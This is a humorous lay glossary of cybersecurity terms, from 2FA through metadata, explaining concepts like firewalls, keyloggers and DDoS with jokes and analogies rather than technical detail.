Wizernary - Translating Geek to English
Have you ever nodded your head to pretend to know what your Tech Team is talking about?
Now you don't have to! Introducing....
A fabulous collection of cyber security definitions with all of the wit, humor, and sarcasm of Wizer Warlock, Chris Roberts! So entertaining, you'll want to read them over and over!
Inspire us by sharing your own term!
2FA (Two factor authentication)
That code you get on your phone from the Internet
Access Control List
This is the border guard that’s standing between you and the other side of the network, file, object, or program that you want to interact with. If you’re on the list, then you’re in and if you’re not, then you’re likely to get the digital equivalent of a really bad headache as you’re sent off to NULL.
Passport control in the digital world
That end user license agreement you clicked “agree” to? You know the one you just clicked when you installed your computer, new program or shiny app on your phone? Yea, that one… that’s the very document that absolves the company you just gave your money to from ANY responsibilities or liabilities if it doesn’t hold up its end of the bargain. Get a virus, it’s your fault...program crashes, probably your fault...got ransomware? Yeah, your fault again. Rarely IF ever does anyone in our industry stand up and take responsibility when their product fails. Welcome to the anti-accountability of InfoSec/Cyber.
Something that’s sorely missing across our industry
Power corrupts, absolute power corrupts absolutely… it’s like having the master key to life, but in the digital realm.
When your phone or system lets you make whatever changes you want, irrespective of any consequences beyond simply asking “are you sure?”
No permission required…
Admin (istrative) Account
This is the account that comes with a cape, underpants on the outside, and can leap tall buildings on demand. It’s the account to rule all accounts and probably needs to be thrown into the nearest volcano because of the problems it causes when it’s enabled and left on for anyone to use OR “because we want OUR users to be
able to do what they need to do…” This is the account that typically has unrestricted access to everything you have, own, or can touch. Use carefully AND keep caged when not in use!
Omnipotent Mode for folks who don’t know Linux
Your digital enemy, they’re out there, in the trenches, the forest, or the building next door, just watching for that opportune moment to take advantage of you, your family, team, company, or the supply chain you so perilously rely upon.
Someone who wants to steal from you or do harm to you
Advanced Persistent Threat
It’s like the digital version of WMDs. We’ll scream from the top of our lungs that we’re about to be brought to our knees with APT’s coming in from (pick a country we don’t like in the moment) until someone gives us money OR allows us to go on the rampage… Then we find out we actually got breached because some numpty left the digital keys under the front door mat.
Really sneaky adversary who doesn’t set off the alarms
You know when you go to look at one website and all of a sudden thing start appearing on your screen like mushrooms after a good rainfall? That’s adware at work. They are the unwanted pop-ups that appear all over your screen trying to entice you to click or subscribe OR pleading for you to just stay etc.
It’s a form of malware that’s really just unwanted or nuisance advertising. You can stop it with the correct settings on your device, and you can clean it up with the right software… Think of it as the digital version of mace, sometimes that’s what it takes to stop someone from pestering you
Unwanted digital billboards
For once, the name actually means what it does. It’s a program (or series of programs) that are designed to find viruses or other harmful programs on your systems (computer, web browser, phone, fridge, etc.) The modern ones are called “Endpoint Protection” and basically are evolved versions of this with more functionality and a whole lot of flashier lights…
Digital vaccine, but not always effective, kinda like the flu shot…
You know how someone takes over a conversation, or hijacks a point you’re just about to make? OR that person that won’t ever let you finish a sentence because they “always” know the answer? Welcome to the human version of arbitrary code execution. It’s simply when a computer allows someone else to run THEIR programs instead (or as well as) yours… Basically, they’re taking the wind out of your sails and leaving you high and dry.
Sneaking in a program using unlocked side entrance….
Artificial Intelligence (AI)
Really smart computer, it can beat you at chess, but still can’t make good coffee.
You know when the Doctor comes into the office with the KY jelly and gloves? That’s an assessment. It’s a way to understand risk, review what’s in place against what should or should not be there, and then to help you work out an effective remediation plan. In the digital world, we occupy that assessment can take in all sorts of controls that have been devised by the industry to try and reduce risk, raise awareness, and slow down the adversaries. It’s designed to highlight deficiencies in the human, the policies, procedures, controls, AND technology.
You and yours under the microscope…
In our world, an asset is any data, device, or component of the environment that houses or supports information related activities. It’s not a Jason Bourne thing where it leaps out of the cupboard at a moment’s notice and starts to attack you…although that MIGHT happen if your asset falls into the adversary’s hands. After all, what’s yours is MINE, and what’s mine remains mine…
It’s something tangible in EITHER the physical or digital realm
It’s the digital equivalent of you leaving your door open, your window ajar, or car unlocked. It’s simply another way to say how someone may attack or take advantage of you. It’s simply the method used to break into you.
How do I love thee? Let me count the ways… See, even Elizabeth Barrett Browning was doing assessments in the 1800’s.
Taking advantage of you
(Log, Record, Tools, Trail)
This is the time that (unfortunately) many companies and individuals dread. It's the time when the folks arrive who are going to ask all the awkward questions that we've been avoiding, AND our job to distract and disarm them to a point that they leave with a good feeling AND have ticked the box that once again, we're all nice, cozy, and safe for a year. OR, at least that's what it HAS been up to at this point which is a large part of the reason we're failing so badly at this whole security thing. What we SHOULD be doing is welcoming the auditors with open arms, having them help us understand our weaknesses, AND build the necessary business risk and maturity cases to take to the business to better help them understand the reality of the situation. Idealistic? Probably, but given the tactic of hiding everything from them as so far failed, then I'm up for a better and more accountable way to deal with auditing in all its facets.
The day of reckoning...
This is simply the name for the process by which we work out "you are who you say you are." Be you're at the ATM and having to put your PIN number in, sitting at a keyboard typing in a password, or looking at the phone while it decides if that moustache is real or false…They are all methods of authentication. It’s simply working out if you are true, genuine, and valid.
Remember trust AND verify… this is the verify part.
The typical way to look at this is simply “Can I get to it, is it accessible, can I see the website or the app and is it responding?"… that’s how any normal person views the subject. In engineering terms, it’s the degree to which something is in a specific state at the start of a specific period of time. In the digital world, it’s both of these measurements AND also the study of redundancy and what dependencies we have ON that specific service, site, or web page. Remembering the complex web of systems between you and that website often means measuring availability (or relying upon it) across many technologies and locations.
Refresh again, and again…is it there yet?!?
Remember snakes and ladders? A backdoor is like finding that one ladder on your first go that puts you right at 99… Typically, backdoors are disguised or hidden by their creator. More often than not, they used to be fun. (Easter eggs where if you knew the keyboard sequence you could get the program to do something fun) BUT, these days, theirs always talk of putting backdoors into encryption. Problem is, a secret entrance is no longer a secret once more than one person knows about it.
It’s the not-so secret entrance…
It’s an analog dollar in a digital world. Think about it… if I hand you $1, I can’t spend it again, but in the digital world I could copy that digital dollar as many times as I want, so we put that digital dollar in a ledger (so it balances) and we show that I gave YOU my electronic dollar , and we write it down and share it with everyone…so now everyone knows I gave you my digital $1. In the real world, I could just shout out to everyone around me that I gave you my money, but in the digital world it’s all recorded on all the systems that I did it… So, I can spend it once, and if I help WITH the system I can become part of the “mint” (I can even run my own digital printing press as long as I have enough computers) and I can tell that ledger that I’m doing it. Welcome to Bitcoin, a digital dollar in an analog world.
Digital dollars in a digital wallet
There are no hats. There’s certainly NO black hat is bad, white hat is good. Did we use it in the past? Yes. Do we have a conference named after it? Yes. Have many of us realized that it does nothing more than perpetuate a stereotype that is both wrong for our industry AND society as a whole? Yes. Are many of us active in trying to do away with this labeling of good vs. evil? Yes.
Will we succeed? We HAVE to.
Remember the old way of doing accounting? Two ledgers? It’s a digital version of that, but a whole lot more ledgers and a LOT more accountants, all working furiously to record transactions and make sure that they agree AND that nobody can mess with the books.
It’s a digital version of your check register that’s shared with ALL your friends and family.
Your computer. Really, it’s YOUR computer, or anyone’s system that’s infected with malicious code, that’s then used to attack and infect others.
A lot of computers being controlled by someone else other than their owners
Remember the Dutch story about the kid that saved the country from flooding? Yeah, it’s like that, but there’s no kid, the hole’s big enough to drive a bus through, and the water? That’s YOUR data leaving…
Someone you didn’t invite in just backed up ALL your data, snuck it out, and has it.
When someone breaks into your home, office or computer
When I don’t know the answer, I guess… and the system lets me keep guessing. Mostly used against passwords where I can “guess” up to a billion times a second using certain types of computer equipment.
Using a digital sledgehammer to crack the walnut
In computer terms, (and not Mother Nature’s creepy crawlies) it’s a coding error, a flaw, an error, or someone, somewhere forgot to put a ";" where it was needed… The program will often still work, but somewhere, something has taken notice and it’s eating memory (making your computer slow) or simply it’ll stop working (for those of you old enough the Microsoft blue screen of death…)
It’s estimated that there’s 15-50 “bugs” per 1,000 lines of code, and most modern cars have 100 million lines of code in them… Think about that next time you are speeding on the motorway.
It’s a flaw, unless you are Apple or Microsoft in which case it’s an “enhancement”
Bring Your Own Device - What it really means is that the company doesn’t want to buy you a computer or phone and you can use your own OR they want to give you one from the stone age and yours is better.
Using your personal device to do work on…
How DO we know what’s at the other end of a keyboard? Ask it a question? Get it to explain emotions? Tell it to solve a riddle? OR do we show it a picture of zebra crossings and traffic lights and ask it to select all the squares with squirrels? Do we show some abstract art cunningly disguised as numbers and letters? Welcome to captcha, one way to (hopefully) slow down the number of automatic computer programs that flood our systems with spam emails and absolute rubbish… The idea is simply to work out if there’s a human or a machine at the other end of the keyboard.
Separating the humans from the microchips…
Nope, it’s not the spy agency that collects and disseminates foreign intelligence, neither is it a bunch of digital spies. It IS the acronym for Confidentiality, Integrity, and Availability which is also known as the CIA triad (talk about adding confusion to things!) These are the three cornerstone principals by which many organizations should aim to build their security functions around. The logic being that any system, data, objects or resources are protected from unauthorized viewing, that changes are correctly and reliably done, AND that the system and resources are
usable whenever necessary.
A more caring and sharing version than our namesake…
CISO, CIO, CPO, DPO
Chief Information Security Officer, Chief Information Officer, Chief Privacy Officer and Data Protection Officer. Welcome to the senior leadership acronym soup for those that are typically empowered to manage, maintain, and effectively protect (as best as possible) YOUR data and the integrity of the systems it’s housed within.
All the chiefs...
We don’t know how it works, what it looks like, or who’s hands were on the keyboard…we just have to trust that it works, carries on working, and doesn’t break (too often). This is the realm of closed source software or systems. Remember as a kid when you asked how something worked, and the adult answered, “it just does!”? That’s closed source in a nutshell. It’s the total opposite of open-sourced where the developers, companies and folks put their code and their inventions out there for everyone to look at, review, understand, use, and possibly improve or enhance.
You’re NOT allowed behind the green curtain…
The easy answer is “it’s someone else’s computer” BUT that's like comparing an AMC Pacer to a Bugatti Chiron… Technically true, but about as far from the reality of things as possible. Think of cloud computing as VERY specifically designed and built for one core purpose…the flexibility to allow the rest of us to move all our data, systems, and lives TO it with minimal fuss and hassle…
Next door's computer (you know I had to leave that one in…)
Shared computers and storage in large buildings all over the world
It’s not edible, at least by you… your computer likes them, and websites LOVE feeding them TO your computer. Some of them are nice, the good ones just want to remember what you looked at, what your preferences are, and they help with customizing your experience ON the website. However, there’s a LOT of cookies out there that are NOT nice and are used by advertisers NOT associated with the website you are on. Typically, they are called 3rd party cookies and they will track you, your movement, and do their level best to profile you and work out how to sell you something or worse.
Think of them as a digital fingerprint of where you’ve been on the Internet, what you looked at, and what you did…
It’s a digital (software) tracking device.
This is the digital equivalent of someone coming into your shed, borrowing all your tools to run their gardening company…or coming into your kitchen, using your stove, and ingredients and then selling it…right under your nose AND you don’t even get a free sample.
It’s someone using your computer for their benefit (normally your web browser) so they get to crunch numbers with your processor and slurp up your electricity and likely all you see is a slow computer and keep wondering why your internet’s as slow as molasses.
SETI gone bad...
This is one example of where marketing won over common sense. Cyber is simply the collective name that’s been associated with anything related to the Internet, computers, and the digital age. It’s a combination word taken by blending computer, networks, virtual reality, visions of the future, and whatever else they could find to make Information Technology sound cool and appealing.
We can go back to the Greek and take their word for pilot or steersman (nautical) as those who held the future, and we’ve also got the 1940’s to blame with cybernetics which was the study of control systems and the communications between people and machines. Ultimately though, Information Technology was too much of a mouthful, so cyber was resurrected, dusted off, and the marketing machine ate it up.
Technology… OR a box of microchips doing something fancy…
The protection of computers, networks, systems, hardware, software, and all things related. To protect from theft, damage, or attack by others. To guard against disruption, misdirection, and to safeguard the data entrusted to us. That’s meant to be the heart of Cyber Security. Arguably, we have one job... to protect others. People before process and always before technology.
To ensure confidentiality, integrity, and availability of information and the very systems we all rely upon.
The digital guardians
Denial of Service (DoS)
Think of this as someone unplugging the Internet, or part of it… you can’t get to what you want, your web browser’s sulking, and Netflix is offline. IF you are experiencing a DoS then it means you’ve annoyed someone enough that they worked out how to unplug you or your computers from the Internet, either by attacking your network devices or computers. (office ones or on the Internet somewhere.)
Stopping you from using your digital world
We understand physical security. (locks on doors, windows, and boobytraps in the lawn…) This is the digital equivalent. Think of all the ways we work to try and protect you, your identity, computer, phone, files, and pictures in “our” world. It’s an all-encompassing term that is used to describe the entire process of digital protection.
The cover-all term for all things cyber, cyber, cyber…
The use of digital technology to supplement people and processes in solving problems. Taking something that was manual or human intensive and working out IF and HOW technology could help. The greater goal of digital transformation is cultural and breaking down borders and barriers by bringing everyone together to solve problems, share solutions and simply benefit humanity in all manner of unique ways.
By bringing a diverse cultural experience to a wider audience, in simple terms it would be a market trader in Uganda working out they could sell their goods online. (Etsy, Amazon, Etc.) All of a sudden they’ve got an audience of 4 billion as opposed to whoever’s passing by on the street. It’s got benefits (audience) and challenges (shipping, logistics, tracking, etc.) Opening a business’s eyes to the digital world…
Opening a business’s eyes to the digital world…
Distributed Denial of Service (DDoS)
Like the Denial of Service but typically done from a whole lot of different computers…think of this as the movie “300.” You’re guarding that passageway and a WHOLE LOT of digital Persians are throwing the entire digital version of the kitchen sink at you…eventually you’re going to fail…so go make a cuppa tea and start to go through your Incident Response Plan (see below)
Remember those times at a party or when you’re out enjoying yourself, there’s a crowd of noise and you’re trying to hear ONE person, OR when everyone’s talking to you at the same time and you’re trying to listen to ONE voice… that’s a distributed denial of service.
Think of this as the digital version of turning it up to 11…
An Englishman’s digital castle… Think of a domain as your piece of the digital world. You’ve decided to go onto the Internet and want to stake your claim (remind anyone of the Oregon Trail game… same idea, and as bad a consequence sometimes). A domain is yours (rented for however many years you pay) where you can put whatever you want in it or on it, congratulations you can become the next Amazon, OR could fade away like Myspace…
It’s your own country in the digital world.
It’s that first part of that address you type into the browser… (Amazon, Yahoo, Facebook, etc.)
Domain Name Server (DNS)
Think of it as the contact list or address book for the Internet. However unlike an address book this one’s distributed, and the first place you ask doesn’t always know where to send you…so it goes and asks someone else for the address (root server) that then often goes and asks another server (top level domain server) for where it’s hiding the location… anyway, long story short, your request CAN bounce around while the right owner OF the right address is found. Once that’s discovered your computers told where to go, and off you wander. The upside OF this whole system is that you don’t have to remember an almost infinite number of IP addresses (digital version of a phone number) NEITHER do you have to wait for Elizabeth to come into work and tell you the address (for those of us that remember the REALLY old days!)
The internet's phonebook...
Think of this as the digital version of the WWI and WW2 Windtalkers (or code talkers) that were engaged by the US Military. Originally, the Cherokee and Choctaw peoples helped in the first Great war, then the Navajo in the second. The logic being that only the sender and recipient can understand the message, and to everyone else it’s simply noise.
Turning perfectly usable data into mumbo jumbo since 1900BC, or around 1990 if we are talking the modern digital equivalent.
It’s the digital version of invisible ink.
For once, the word described the digital world. Endpoint is literally that. It’s the end “thing” on the dangly bit of the network. Your computer, laptop, phone, tablet, fridge, and Alexa are all endpoints. (even if the dangly piece of the network is wireless) It is simply the termination of that particular branch of a network. Think of it as the bus depot or train stop where the track or road dead-ends. It is also the latest buzzword that is meant to conjure up the new battlefield of our digital age which is why SO many companies are trying to sell you agents (little pieces of code) to sit on your endpoint so they can be monitored in the hopes of catching more adversaries. IF only we all knew WHERE all of our endpoints were…
Anything that’s got a beating digital heart on your network
Typically, enterprises are for profit businesses and depending upon how the word is used, it can describe scale, ownership structure, or many other elements relating to business classification.
It’s also an undertaking, typically a complex, bold, and all-encompassing one that is likely to swallow up ½ the company and cost 3x the original estimate… Welcome to the world of ERP (Enterprise Resource Planning) projects and all the scary things that come with them…
To boldly go where no business has gone before
Often in the digital world, we talk of events in reference to log monitoring, management, and collection systems. It’s a “thing” that happens often (especially if we’re referencing it among millions of things) one of importance. In basic computing, we keep logs of events on various systems. These are often then copied elsewhere (to a log management system) where they’re compared, referenced, and someone, somewhere decides if that event is important OR if it can be filed away with the rest of the data. Certain events we focus on are incorrect passwords being tried, or someone rattling the digital doors and windows of our world etc.
A digital diary of what’s happened
In the real world, we’d think of this as stealing or shoplifting. The attempt by someone to remove something that doesn’t belong to them from a location (store, house, car, etc.) in the digital world is the same thing except replace that item with data. It’s the unauthorized attempt to remove data (data transfer) from where YOU last left it TO a location that they want to take it.
All your data no longer belongs to you...
In the physical world, it’s the crowbar that was used on Pandora’s box, or the same one used to get into your house, shed, or car. It’s simply the act of taking advantage of a vulnerability OR causing a situation where a vulnerability opens up…
To take advantage of you
If you think of this as a relay race, the 4x100 or 4x400, there’s 4 folks, each of which is probably capable of running the whole distance IF they paced themselves BUT they have to go flat out for ¼ of the entire distance and by the time they get to handover the baton, their muscles are probably screaming and demanding a rest…at which point the next person takes the baton and carries the load for their allotted distance. IF it goes well, the handovers are smooth, seamless, and appear to be fluid without interruption from all gazing in. IF it doesn’t go smoothly, then 4 years of training and the hunt for gold disappears in a tangled heap of arms, legs, and frustration. In the digital world, it’s the same. A smooth failover will rarely be noticed, yet a messy one can mean outages, data corruption, and a lot of frustrated folks.
Seamless load shifting between resources
It’s meant to be a barrier between you and the rest of the Internet when you are sitting at home or in your office, it’s meant to protect you from some of the bad stuff out ON the Internet (or the office next door) but in practice it’s as leaky as an old sieve and as much use as a chocolate fireguard. The problem is, it can’t BE a barrier because it has to let SOME traffic through (the stuff you WANT to see) but in opening that door it’s not very good at stopping uninvited guests from sneaking in too. It tries to ask everyone for their invites, or to ask them why they want to come in, but the attackers are sneaky and will lie to your firewall, and unfortunately, most of the time, it believes the lies.
It’s like Jeeves at home, it’s great at being nice to the right guests who come to the front door, and it can sometimes catch the ruffians trying to sneak in, but it’s fairly useless at watching the windows, the back door, and heavens forbid someone sneaks in through the coal chute… You can’t pension Jeeves off, but you can’t rely upon him to REALLY guard the place.
The digital butler, great if you abide by the rules, totally flummoxed otherwise.
Federal Information Processing Standards (FIPS)
Welcome to a set of standards that are meant to make sure that we all communicate, collaborate, and cooperate in a cohesive and defined manner. Remember that scene in Independence Day when Will Smith and Jeff Goldblum save the day by injecting the alien mother ship with a virus uploaded from a MAC? We all wondered WHY that worked and the truth is ALL down to FIPS. Apparently, we’ve been using the same common standards as they have for system interconnectivity and programming languages. See! Told you the Government’s been holding out on us… FIPS covers many different areas within the government and folks working with and for them, and thanks TO the standards some of the basics are covered and we don’t have to keep guessing or asking for the standards, etc.
Well-meaning standards IF only they could write them in English…
It’s the programs that make the hardware work. When you mash a key on the keyboard OR you yell at Alexa OR print something, there’s a layer between what you’ve done and the app or computer software that shows you the results. That’s the firmware. The keyboard tells the firmware what was pressed, that then tells another piece of software in the operating system (Windows, Linux, Mac, iOS, Android) what you did, and then lo and behold it appears on the screen in the right place… Same for Alexa, the sound hits the microphone which translates waves into 1’s and 0’s, the firmware tells the software what it heard and the rest happens…it’s the layer that makes things work.
It’s THE doorway between human interaction and digital reaction.
To harshly insult you using the Internet as the delivery method. More often than not, it’s done anonymously. (one of the worst aspects OF the Internet is the ease in which people can hide…)
The digital equivalent of “Your mother was a hamster, and your father smelt of elderberries!”
As in the physical world, so be it in the digital one… In the human world, ghosting means to abruptly end a relationship by burning the cards, throwing away the phone, and deleting the email account… In the digital realm, it’s when that’s done TO you… All of a sudden you don’t exist, your cards don’t work, you have no credit, and apparently your social security/national insurance number was given to a squirrel that’s now stuffed on the mantle piece of your adversary. You have become a non-entity, congratulations now you can join the CIA. ;-)
You’ve been erased, wiped out, digitally you are no more.
A living, breathing yellow pages...
A digital portal to the world. Be careful what you ask for...
Governance, Risk, and Compliance (GRC)
AS the name implies, the aim of GRC is to help manage an organization's overall governance, enterprise risk management, and compliance with identified/required regulations. It’s a framework or a structure that helps to align IT and the business while managing risks AND meeting compliance. It’s a mouthful isn’t it? The logic is when an organization wants to understand its risk, (how often is InfoSec now being asked to do risk assessments NOT penetration tests etc.) it can identify what those risks are, translate them to the business, and then clearly align the teams to focus on measurable tasks. At the end of the day, GRC is meant to make sure that we’re all rowing in the same direction FOR the same reasons.
Bridge building between technology and the business
That’d be me, us, a community, and a LOT of folks who are day-walkers OR who don’t necessarily prance round in hoodies ALL the time. We’re the good folks, and according to Hollywood, we can stop ships, take control of power stations, AND hack aliens using an Apple Mac. Apparently, the media and the marketing folks in our industry didn’t get those particular memos.
We’re the tinkerers, wizards, witches and warlocks of the digital age…
Community Submission from Douglas Bodden:
Hacking is the fine art of finding leverage where no one things a fulcrum can be placed.
The physical elements of the computer, system, device, or blinky lights that you’ve purchased… Those things WITH form that occupy space, gathering dust bunnies, or cluttering up the cupboard. (Once they’ve been superseded (Betamax player anyone?))
The things you can touch, the keyboard, screen processor, hard drive, mouse, etc.
The part of the computer you CAN throw across the room when it reboots unexpectedly…
It’s the mathematical formula or function that takes whatever you’d typed on the keyboard or pointed it at and scrambles the heck out of it so that it looks like it makes no sense to anyone apart from the computer itself. (or whatever program or reason it got hashed for in the first place.) The value is unique to the original text, file, picture, OR entire hard drive, so if you change something and run that hash function again… you’ll get a different output. We use the function (or formula) for a whole bunch of things from encryption to forensics and indexing. (think Google etc.)
Converts one thing into another, often leaving the output “looking” strange BUT really useful.
Health Insurance Portability and Accountability Act (HIPAA)
HIPAA is a federal law that’s meant to protect sensitive patient information from being disclosed without their consent or knowledge. It tries to cover the areas of physical and digital security as well as administrative best practices. It’s meant to cover anyone that has OR would come into contact with any of your data, from the Dr. you see, the hospital, dentist or other locations AND all the people, companies, and 3rd parties that interact with them.
If HIPAA was taken in the spirit of what it embodies, it would be effective and do a fantastic job of protecting the patient and all their data, however, that’s not always the case which is why we still see so many breaches in healthcare.
Healthcare’s Golden Rule
Think of putting that pot of honey out for Pooh and watching how the pot gets examined, how our intrepid little bear dips a hand in and swirls it around. Maybe it was placed there so Pooh spends all the time looking at the obvious pot and not the hidden stash or maybe it was discovered there (or placed?) so someone can observe exactly how the bear plays with and eats the honey so you know how, who, and why to block or defend your larger stash of the sticky bee byproduct.
It’s a TRAP! has never been truer…
A digital signal that moves between various devices on the network to demonstrate they are alive, active, and working. It can also be used as a way of synchronizing systems OR being one of the first steps in ascertaining if the environment needs to failover to another node or location. (No heartbeat, no life… So as in humans we see in digital.)
Proof of life
Human Machine Interface (HMI)
It’s the way we interact with machines. At the moment, we’re in the early stages of hooking the brain up to the computer, so for now we have to rely upon an interface that we can interact with. A screen like the touchscreens we have on our phones, tablets, OR the ones we use in ICS/SCADA systems are good examples of HMI’s. Arguably, a keyboard, mouse, stylus, or other device where we take out analog self and apply instructions to a digital system would be considered an HMI, however more often than not in the real world, most HMI’s are focused in harsher environments or those with limited space where a single interface is preferable.
Our analog connection TO the digital world.
Identity and Access Management (IAM)
IAM is a collective term that covers the framework of establishing who you are in the physical world then securely using that in the digital one. The collision of process, policies, and products to effectively manage users, their identities, and access permissions across an organization (or application.) We often talk about knowing WHO’S hands are on the keyboard as well as what access they have to have to certain thing being one of the most difficult challenges within our industry. Now extrapolate that across traditional networks, shadow networks, cloud environments, home systems (thanks to the 2020 mess…), as well as everything in between. You quickly see where a simple ID and password won’t suffice as a solution for access. We can also see that this is not a technical solution solely. We have to have policies, procedures, and controls in place for the human themselves as well as knowing what they need to have access to. (and when/why/for how long etc.) It’s a technical and logistics nightmare if you don’t have a good framework in place.
Proving you are who you say you are in the digital world.
Why be you when you can be new? OR why be you when you can be someone else? Identity theft is simply the act of becoming someone else for the sake of financial gain, enforcement, avoidance, or something else where being “you” is detrimental to the situation. In the real world as kids, some of us would forge our parent/guardian’s signature on the homework record? In the digital world, it would simply be the act of becoming the parent…
In the digital world, we truly can be anyone we want to be…
It can be almost anything that has the potential to cause harm to something under your control, management, or care. Did someone click that email link without thinking or asking first? Did someone enable macros? Did another person fall for the “click to download free antivirus?” Who put their corporate user ID and password into that website that magically showed up? Did you just authorize an escrow payment because the “boss” told you to do it over the phone? You get the idea…There’s 1,001 different ways TO have an incident, sometimes they’re not too serious, other times you get a red screen, a ransom note on your computer and the world feels like it is burning around you.
That moment when “whoops” isn’t enough OR you NEED the world to swallow you up…
Incident Response Plan
When all hell is breaking around you and you’re sitting there in the middle of things as calm and as cool as a cucumber. It’s because YOU have a plan. You know what to do, where to be... and as soon as you can get everyone’s attention, you’ll start to bring order to chaos. Think of the IR plan as a series of instructions on what to do just before the end of the world.
It’s our version of those flight safety cards, instead of telling you to put your head between your legs and kiss your ass goodbye, we simply want you to unplug the computers, grab the office dog, and exit safely.
A set of Instructions for when all hell breaks loose
Industrial Control Systems (ICS)
A general term that encompasses large and small industrial systems including monitoring of machines or processes and changing portions of the machines or processes. Think of them as the digital monitors that watch the oil flow, or the well work, or the wheels turn on the critical systems that keep US warm, watered, fed, and sheltered. Unfortunately, many of the systems were not designed with security in mind, heck they were designed to work independently for decades and never be connected to anything…then WE came along, found the loose end of the network, and plugged it all into the Internet… and we wonder why there’s SO many issues!
The digital eyes inside Maslow’s hierarchy
It is the application or use of technology to store, retrieve, transmit, and work with data. (information) It’s typically applied within the business world, but has its modern origins firmly rooted in the mid 1940’s when the first programmable digital electric computer was designed and used (Colossus) for deciphering enemy encryption. Since then, information technology has infiltrated almost every facet of modern life as we strive to store more, read more, and share more, faster and faster with each passing year. The origins of our digital world…
The origins of our digital world...
A risk that originates from inside. Doesn’t have to be an employee, and often is overlooked as a potential issue within many organizations. Historically we called this an “insider job” and history is littered with examples of banks being robbed by their own managers etc.
The digital rotten apple
If a human has integrity, there’s a level of trust based on a number of elements. If a system has integrity, then it’s doing what it’s meant to be doing. However, when that system loses integrity, it can lie to you and give you bad information, take your data, or simply shut up shop, go on strike, and never be seen again... Think of data also having the same properties. If you read something, do you believe it? What’s the source, does it have integrity, did integrity break along the way, OR can you trust it? This is the next evolution of security, safety, and the battle we are in.
Internet of Things (IoT)
This has become the collective noun for everything that has a microchip in it that’s connected to a network. From the toothbrush that talks to your phone, to the fridge and microwave arguing with the doorbell… It is the billions of devices we are surrounded with that are apparently meant to make our lives easier and free up time. From your home, your vehicle, place of business, and everything in between, we interconnect these devices in the hopes they help us. It’s Skynet before gaining consciousness.
It’s Skynet before gaining consciousness.
Internet Protocol (IP) Address
If you look at an IP address, it’s often 4 sets of numbers separated by a “.” Each block has a meaning and each part of that block will help speed your digital message, mail, or YouTube video to and from the right place (most of the time… like the post office, sometimes it DOES go pear shaped.) We have two different types of addresses, but for all intense and purpose, they do the same thing…they help work out where to send your digital life.
Your digital street address on the Internet
Intrusion Detection System (IDS)
Think of this as the “jobsworth” guard. It does what’s asked of it… it detects and reports BUT does nothing else, and depending upon how it’s been trained (configuration being key,) it might over alert like a well caffeinated Duracell bunny at which point it gets ignored (shepherd crying wolf too often anyone?) OR it might simply sit there and watch the content of your enterprise get lugged out the front door. Sometimes, it even holds the door open FOR the adversaries. It’s all down to how and what you’ve told it to do…nothing more, nothing less. Don’t expect too much from it, it’s one step above a firewall but still as dumb as a box of rocks.
I think therefore I am… going to just write a TPS report about it.
Intrusion Prevention System (IPS)
Think of this as the Ying to the IDS’s Yang… they are often bundled together as each alone is kinda useless, but together than CAN work well OR they can be like Tweedledee and Tweedledum and give the adversary a right laugh as they saunter past them en route to rummaging around your entire enterprise. As with the IDS, it’s all about continual training and configuration, which, unfortunately, is something that many folks in our industry forget about.
A digital trapdoor, great sometimes... BUT Indiana Jones can still get past IF determined.
It’s the glue that holds YOUR Internet experience together.
Community Submission from Loannis Samantouros:
Those “public” USB charging ports you see at the airport, the coffee shop, the rental car place, etc.? They’re not always as innocent and as friendly as they seem. The ability to take your data from you through the charging port or the very cable itself is, unfortunately, a very real and simple attack vector that’s used to separate you from your data. Serially transmitted diseases are a problem, only plug in to your own charger or use a USB condom.
Just because it’s free, doesn’t mean it’s safe.
It’s THE computer program that’s at the core of the operating system you use, it talks to the hardware, the memory, keyboard, and then takes those conversations and discusses them with operating system and applications you use. Think of it as the broker between you mashing that keyboard and the letters appearing
on the screen…there’s something REALLY complex that has to happen, and the kernel makes sure that it does.
Digital Gandalf or Mercury (winged messenger)
These are programs that watch what you type. They sandwich themselves in the digital world between your keyboard and the operating system or on a mobile device. They often hide RIGHT in front of you as a “cover” for your keyboard. (It looks just like your normal keyboard on your phone.) Their job is to simply record everything you type (mistakes and all) on the keyboard. They are logging passwords, messages, notes, and where you go on the Internet or who you’re talking with. That data is then sent to whomever installed the program on your machine. Often times, they do this without you knowing about it. They’re sneaky, malicious, and often go undetected for a long time.
Remember the Yellow Pages advert “Let your fingers do the walking?” A keylogging program would be the one watching those fingers walk EVERYWHERE…
It’s the unwanted digital assistant watching your every move.
Leet Speak (l337)
These days, more often than not, it’s someone who drank too much of their own Kool-Aid or hasn’t found their way out of the bulletin boards. (our digital meetings places before we had Myspace, Facebook, Etc.)
It’s a form of substitution using characters, numbers, and other things to substitute the alphabet within a word. (Hacker becomes h4x0r, etc.)
1t's 4ll gr33k t0 m3 (It’s all Greek to me…)
Sometimes, you can use a key to open the door. (or a sledgehammer) Those are physical access controls… Logical controls would be something that identifies “you” as you, and not just the “you” with the key… Biometrics, passwords, retinal scanners, or other methods, are used to best identify that the “you” in front of the door IS really you and not ME trying to be you. You get the idea or are “you” as confused as me now?
The fingerprint is mightier than the sledgehammer…
Long Lost Uncle
See Scam. Your uncle never was lost in the jungle, nor did he leave a fortune in the bank, nor does that person at the other end of the email OR phone call REALLY care about you. Hang up and never answer the message. Please.
Media Access Control (MAC) Address
A unique code given to every single network interface controller ever made. This is the physical part of the puzzle that allows systems to find and talk with each other in the digital world.
Your physical street address on the Internet.
See Artificial Intelligence. Just slightly dumber than Clippy.
Any program that is intentionally designed to cause harm. It’s a collective term that shelters viruses, trojans, worms, ransomware, spyware, adware, etc. Often folks have accused Microsoft of being malware, sometimes with considerable merit to the argument.
The digital hand grenade
When you used to take a picture (back in the old days) if you wanted to know what it was, which great Aunt was in the shot, or when it was taken you had to scribble notes on the back AFTER you got them from the developers. These days, that job is handled by the metadata. Whether we like it or not, there’s metadata ALL
around us. This document I’m typing into has it. (date, author, file location, version, owner, content, statistics) We call that the properties. Your images have metadata, the location (if you have it turned on) file size and a heap of other little snippets of information ABOUT the information.
It's the data's data.
Millions in the Bank
See Scam. Even if I do have cancer or I’m terminally ill, I’m not leaving my fortune to you, a total stranger whom I’ve just met on the Internet. Seriously, if I have millions in the bank, the relatives will be crowding round me like a pack of vultures and you, my Internet friend will see nothing but an IOU. So run, and run now... and never answer that email. Please.
(Sent in by Rachel Arnold)
